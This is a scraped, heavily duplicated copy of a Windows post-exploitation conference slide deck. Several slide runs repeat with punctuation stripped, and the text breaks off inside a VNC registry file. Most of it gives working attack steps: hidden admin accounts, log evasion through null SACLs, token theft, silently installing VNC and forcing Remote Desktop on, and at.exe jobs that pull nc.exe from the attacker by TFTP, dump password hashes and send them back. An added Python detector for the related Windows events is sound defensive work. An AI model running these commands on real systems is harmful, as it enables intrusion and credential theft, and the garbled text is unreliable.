Abusing The Scheduler

• Building a tool around AT – Flow
    • Establish an authenticated session
    • Determine the time on the target
    • Pass commands to the target to be run 1 min from now
  – Write a batch file that executes everything at once
  – Have the target send you back whatever info you want
  – Be mindful of file transfer protocols; TFTP is good but not always "quiet" or available

Slide 61

Abusing The Scheduler

• Common use example
  – net use \\target
  – net time \\target
  – at \\target (net time + 1 min) "tftp -i use GET e.bat"
  – at \\target (net time + 2 min) e.bat
  – e.bat does:
    • Adds a user (net user hacked hacked /add)
      – Admin group (net localgroup administrators hacked /add)
    • Gets hash-dumping tools and dumps hashes
    • Sends hashes, identified by IP, back to the attacker host

Slide 62

Abusing The Scheduler

• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME
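The changes walked through in the Feature Modification slides (sc config on ClipBook/NetDDE, the secedit logon-right template, the fDenyTSConnections registry flip) and in the Abusing The Scheduler slides (at.exe jobs) each leave a Windows event, and those events are what a defender alerts on. As an added example that is not from the talk or its tools, this Python matches constructed event records written in the shape of the real System 7040 and Security 4657/4704/4698 messages (and the XP/2003-era 602) and reports the findings.

```python
"""Detect the host changes described in the Feature Modification and
Abusing The Scheduler slides from Windows event records.

Added example, not from the talk or its tools. Re-enabling ClipBook/NetDDE
with sc.exe, granting SeRemoteInteractiveLogonRight with secedit, clearing
fDenyTSConnections and scheduling at.exe jobs each leave an event in the
System or Security log. SAMPLE_EVENTS holds constructed records in the
wording of the real System 7040 and Security 4657/4704/4698/602 messages.
"""
import re

# 7040 reports the service display name; map it to the sc.exe name the
# slides use (sc config clipsrv start= auto, ...).
WATCHED_SERVICES = {
    "ClipBook": "clipsrv",
    "Network DDE": "netdde",
    "Network DDE DSDM": "netddedsdm",
    "Terminal Services": "termservice",
}
# Rights the fix_ts_policy.ini template grants.
WATCHED_RIGHTS = {"SeRemoteInteractiveLogonRight", "SeInteractiveLogonRight"}

START_TYPE_RE = re.compile(
    r"The start type of the (?P<svc>.+?) service was changed "
    r"from (?P<old>.+?) to (?P<new>.+?)\.")
RIGHT_RE = re.compile(r"User Right:\s*(?P<right>\S+)")
REG_VALUE_RE = re.compile(r"Object Value Name:\s*(?P<name>\S+)")
REG_NEW_RE = re.compile(r"New Value:\s*(?P<val>\S+)")
# at.exe names its jobs At1, At2, ... (At1.job files on XP/2003).
AT_JOB_RE = re.compile(r"(?<![A-Za-z])At\d+(\.job)?\b")


def check_event(ev: dict):
    """Return a finding for one event record, or None when it is benign."""
    key, msg = (ev["log"], ev["id"]), ev["message"]
    if key == ("System", 7040):
        m = START_TYPE_RE.search(msg)
        if m and m["old"] == "disabled" and m["svc"] in WATCHED_SERVICES:
            return {"rule": "disabled_service_reenabled",
                    "detail": f"{WATCHED_SERVICES[m['svc']]} set to {m['new']}"}
    elif key == ("Security", 4704):
        m = RIGHT_RE.search(msg)
        if m and m["right"] in WATCHED_RIGHTS:
            return {"rule": "logon_right_granted", "detail": m["right"]}
    elif key == ("Security", 4657):
        # 4657 is only written if the Terminal Server key carries a SACL;
        # with a null SACL (slide 37) this rule can never fire.
        name, new = REG_VALUE_RE.search(msg), REG_NEW_RE.search(msg)
        if name and new and name["name"] == "fDenyTSConnections" and new["val"] == "0":
            return {"rule": "remote_desktop_enabled", "detail": "fDenyTSConnections=0"}
    elif key in (("Security", 4698), ("Security", 602)):
        m = AT_JOB_RE.search(msg)
        if m:
            return {"rule": "at_job_created", "detail": m.group(0)}
    return None


def detect(events) -> list:
    """Run every record through check_event and keep the findings, in order."""
    return [f for f in map(check_event, events) if f is not None]


SAMPLE_EVENTS = [  # constructed records, two of them routine to show no false positive
    {"log": "System", "id": 7040, "message":
     "The start type of the ClipBook service was changed from disabled to auto start."},
    {"log": "System", "id": 7040, "message":
     "The start type of the Network DDE service was changed from disabled to auto start."},
    {"log": "System", "id": 7040, "message":
     "The start type of the Windows Update service was changed from auto start to demand start."},
    {"log": "Security", "id": 4657, "message":
     "A registry value was modified.\n"
     "Object Name: \\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\n"
     "Object Value Name: fDenyTSConnections\n"
     "Old Value Type: REG_DWORD\nOld Value: 1\nNew Value Type: REG_DWORD\nNew Value: 0"},
    {"log": "Security", "id": 4704, "message":
     "A user right was assigned.\nUser Right: SeRemoteInteractiveLogonRight"},
    {"log": "Security", "id": 4698, "message":
     "A scheduled task was created.\nTask Name: \\At1"},
    {"log": "Security", "id": 4698, "message":
     "A scheduled task was created.\nTask Name: \\Microsoft\\Windows\\Defrag\\ScheduledDefrag"},
    {"log": "Security", "id": 602, "message":
     "Scheduled Task created:\nFile Name: At2.job\nCommand: e.bat"},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(f"{finding['rule']:28} {finding['detail']}")
```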

Slide 63

Massive Automation

Slide 64

Massive Automation

• Automating techniques and tools for use against massive numbers of hosts

• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use / re-use
  – Lower cost of attack

Slide 65

Massive Automation

• MassNetUse – Establish NetBIOS session credentials on a range of hosts

• MassWinenum – Enumerate NetBIOS information, bypass certain RestrictAnonymous settings

• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts

Slide 66

• DEMOS

Slide 67

• Related talks you should see
  – Beyond EIP – The theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)

Slide 68

• Acknowledgements
  – Thanks to:
    • All the people from offensivecomputing, nologin, uninformed, IRC and SILC channels
    • HD Moore especially, for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work

Slide 69

• Questions?
• Presentation available at www.offensivecomputing.net

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 28: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 28

Persistence

bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access

bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)

bull Only use AT to run your commandsbull Persistence without adding files new accounts

ndash Unlikely to be discovered

Slide 29

bull DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 29: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 29

bull DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet


Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

• Hiding your activity
– From:
• IDS
• AV
• LOGGING
• Suspicious users & admins
• Firewalls
• Process listing

Slide 32

Stealth Evading Detection

• Why Stealth?
– If you get caught, you get stopped
– The longer you can operate undetected, the more you can accomplish
– Admins won’t fix problems they don’t know exist (helps persistence)
– On a pen test you should also be testing the organization’s detection and response capabilities

Slide 33

Stealth Evading Detection

• Goals
– Keep system operable
• If it breaks you can’t use it
• Someone will come fix it
– Operate without fear of detection
– Robustness
• Hiding shouldn’t require constant attention
– DON’T LOOK MALICIOUS

Slide 34

Stealth Evading Detection

• Manual / Existing Tools
– Rootkits, rootkits, rootkits
– Meterpreter
– Encryption
• Shellcode Encoders for IDS evasion
– Log cleaners
– Packers
– Covert channels / Steganography
– Anti-analysis / anti-forensics
• See all of OC’s other talks
• Also Vinnie Liu’s Metasploit research

Slide 35

Stealth Evading Detection

• Different Perspective
– DON’T BE AN ANOMALY
– Hide in plain sight
• Many tools have ONLY malicious uses
• Make your intent hard to determine
– Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

• Different Perspective
– Know the target’s environment better than they do
• If they don’t use encryption, maybe you shouldn’t either
• Change strategies to match the environment’s normal behavior
– Don’t always default to exploits
• See Tactical Exploitation talk
• IDSs can’t see normal behavior that is malicious

Slide 37

Stealth Evading Detection

• Using Windows security objects for stealth
– Auditing of Securable Objects is controlled by SACLs
– Null SACL = No Auditing = No Logs

Slide 38

• DEMOS
– Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

• It’s not always about ROOT
• Look like someone else
– Use the credentials / access of another user
• Goals
– Change your identity at will
• User ID, domain credentials, sessions
• Impersonate system accounts
• Make activities look like normal user behavior

Slide 41

User Identity Theft

• Stages and techniques
– Target users
• Who has access to what?
• Where is the data?
– Change Identity
• Hijack credentials / sessions
• Abuse tokens
– Access is the end goal, be it data or another system

Slide 42

User Identity Theft

• Existing tools
– Incognito (metasploit)
• Enumerate / hijack tokens
– FU / FUTO
• Enable SYSTEM privileges
• Change process privileges (DKOM)
– SU / SUDO / KSU
– Process injection
– Hijack domain credentials

Slide 43

User Identity Theft

Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs, Oh My!

• What we want
– Privileges or SIDs
• What we get
– Access, Access, Access
• How we get it
– Incognito vs FUto

Slide 44

• DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

• Changing existing features or settings to benefit our activities

• Goals
– Support all Post-Exploitation activities
– Disabling detection technologies
– Enabling insecure or easy-to-use access software

Slide 47

Feature Modification

• Feature Modification is Basically Securable Object Manipulation
– Remember all those Tokens and Security Descriptors?
– These can be modified programmatically and directly
• Not just through existing tools
– Stealth / Persistence requirements
• May make it more advantageous to use custom tools
– Access Objects programmatically
– Can be much more complex to implement

Slide 48

Feature Modification

• Re-enabling disabled access
– PsExec: It’s still cool (Thanks Mark)
• Enabling GUI access
– VNC (from a command line)
– Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
– Firewalls, AV, logging
• Modifying Local Security Policies

Slide 49

Feature Modification

• Enabling psexec
– Psexec was a great, awesome remote shell/command tool
– Everybody now disables clipbook, which psexec requires (l4m3)
– Let’s re-enable it

Slide 50

Feature Modification

• Enabling psexec
• Use the service control tool sc.exe
– net use \\target\ipc$ /user:username userpassword
– sc \\target config netdde start= auto
– sc \\target config netddedsdm start= auto
– sc \\target config clipsrv start= auto
– sc \\target start netdde
– sc \\target start netddedsdm
– sc \\target start clipsrv

Slide 51

Feature Modification

• Enabling VNC (from command line)
– Go get VNC (check out guh.nu)
– Make a folder on the target for the vnc files
– Copy the following files to the target folder:
• winvnc.exe
• vnc.reg
• vnchooks.dll
• omnithread_rt.dll
– regedit -s vnc.reg
– winvnc -install
– net start “vnc server”
– winvnc
– Password is “infected”

vnc.reg file contents:

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
